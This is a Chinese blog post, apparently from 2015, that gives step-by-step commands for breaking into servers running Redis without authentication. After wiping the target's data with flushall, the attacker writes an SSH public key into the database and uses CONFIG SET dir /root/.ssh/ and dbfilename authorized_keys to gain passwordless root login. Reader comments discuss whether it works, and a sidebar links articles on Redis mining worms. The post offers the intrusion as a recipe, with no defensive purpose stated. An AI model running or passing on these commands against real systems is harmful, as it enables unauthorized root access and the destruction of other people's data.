文档章节

通过redis入侵服务器的步骤

独钓渔
 独钓渔
发布于 2015/11/18 18:58
字数 311
阅读 2918
收藏 29

通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。

一,生成本地ssh公钥

ssh-keygen

 

二,先连接redis看看

telnet 192.168.15.10 6379
redis-cli -h 192.168.15.10

 

 

三, 清一下redis数据库

redis-cli -h 192.168.15.10 flushall

 

 

四, 向redis写自己的公钥

cat key.txt |redis-cli -h 192.168.15.10 -x set redis

 

 

五, 利用redis写入到文件中

#连接redis
#redis-cli -h 192.168.15.10
#查看keys
192.168.15.10>keys *
#写入配置库的路径及存放位置
192.168.15.10>CONFIG SET dir /root/.ssh/
#写入配置库名称及存放的名字
192.168.15.10>CONFIG SET dbfilename "authorized_keys"
#写入
192.168.15.10>save
#退出
192.168.15.10>exit

 

 

六, 远程连接

ssh root@192.168.15.10

 

 

注意,这个是使用的默认的。也就是说别人是用的root来启动的redis 并且没有更改sshd配置文件的位置,以及redis可以默认的可以随意访问性的。当然有许多可以猜。

这个是最近redis爆出来的。

 

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

 

© 著作权归作者所有

共有 人打赏支持
独钓渔
粉丝 48
博文 375
码字总数 142587
作品 0
沙坪坝
系统管理员
加载中

评论(5)

独钓渔
独钓渔

引用来自“独钓渔”的评论

引用来自“likebeta”的评论

redis保存的文件是自定义的格式, 应该是不行的吧

可以的,请测试

引用来自“likebeta”的评论

我试了, authorized_keys中保存的不只是ssh-key, 登陆不了
我试了,确实可以。 你要把自己的公钥写到key值上去。
likebeta
likebeta

引用来自“独钓渔”的评论

引用来自“likebeta”的评论

redis保存的文件是自定义的格式, 应该是不行的吧

可以的,请测试
我试了, authorized_keys中保存的不只是ssh-key, 登陆不了
独钓渔
独钓渔

引用来自“likebeta”的评论

redis保存的文件是自定义的格式, 应该是不行的吧

可以的,请测试
likebeta
likebeta
redis保存的文件是自定义的格式, 应该是不行的吧
金拱门
金拱门
mark一下。这个洞好玩79
Linux Redis自动化挖矿感染蠕虫分析及安全建议

欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 自从Redis未授权问题获取Linux系统root权限的攻击方法的披露后,由于其易用性,利用该问题入侵Linux服务进行挖矿、扫描等的黑客行...

腾讯云加社区
06/12
0
0
态势感知攻击链分析-Redis未授权访问检测

      Redis未授权访问漏洞介绍   1、Redis应用介绍   Redis是key-value数据库,一般企业级使用场景为内部查询缓存。支持的value值包括string、list、set、zset和hash,为了保证效率...

嘶吼RoarTalk
09/08
0
0
威胁情报| DockerKiller:首个针对Docker的批量攻击与利用实例

随着微服务的热度不断上升,越来越多的企业选择容器来部署自己的应用。而Docker作为实现微服务首选容器,在大规模部署的同时其安全性却没有引起足够的重视。 近期阿里云安全团队发现首个针对...

云安全2016
08/24
0
0
服务器被入侵(minerd挖矿程序)

一:问题说明 1、我的服务器是使用的阿里云的CentOS,收到的阿里云发来的提示邮件如下 然后我查看了运行的进程情况( 命令),看到一个名为minerd的进程占用了99.5%的CPU 2、minerd是个挖矿程...

奔跑的阿飞
2017/09/05
0
0
记一次服务器被挖矿程序入侵的解决过程

公司有台做voip的服务器最近CPU总是跑满,这机器自从交给厂家搭好环境后基本就没怎么管它,于是进去查看进程,top了下(见下图)这个叫wnTKYg的进程很诡异,已经把CPU吃光了,上网一查,原来...

Tyrant0532
2017/12/05
0
0

没有更多内容

加载失败,请刷新页面

加载更多

70.shell的函数 数组 告警系统需求分析

20.16/20.17 shell中的函数 20.18 shell中的数组 20.19 告警系统需求分析 20.16/20.17 shell中的函数: ~1. 函数就是把一段代码整理到了一个小单元中,并给这个小单元起一个名字,当用到这段...

王鑫linux
今天
3
0
分布式框架spring-session实现session一致性使用问题

前言:项目中使用到spring-session来缓存用户信息,保证服务之间session一致性,但是获取session信息为什么不能再服务层获取? 一、spring-session实现session一致性方式 用户每一次请求都会...

WALK_MAN
今天
6
0
C++ yield()与sleep_for()

C++11 标准库提供了yield()和sleep_for()两个方法。 (1)std::this_thread::yield(): 线程调用该方法时,主动让出CPU,并且不参与CPU的本次调度,从而让其他线程有机会运行。在后续的调度周...

yepanl
今天
4
0
Java并发编程实战(chapter_3)(线程池ThreadPoolExecutor源码分析)

这个系列一直没再写,很多原因,中间经历了换工作,熟悉项目,熟悉新团队等等一系列的事情。并发课题对于Java来说是一个又重要又难的一大块,除非气定神闲、精力满满,否则我本身是不敢随便写...

心中的理想乡
今天
47
0
shell学习之获取用户的输入命令read

在运行脚本的时候,命令行参数是可以传入参数,还有就是在脚本运行过程中需要用户输入参数,比如你想要在脚本运行时问个问题,并等待运行脚本的人来回答。bash shell为此提 供了read命令。 ...

woshixin
今天
4
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部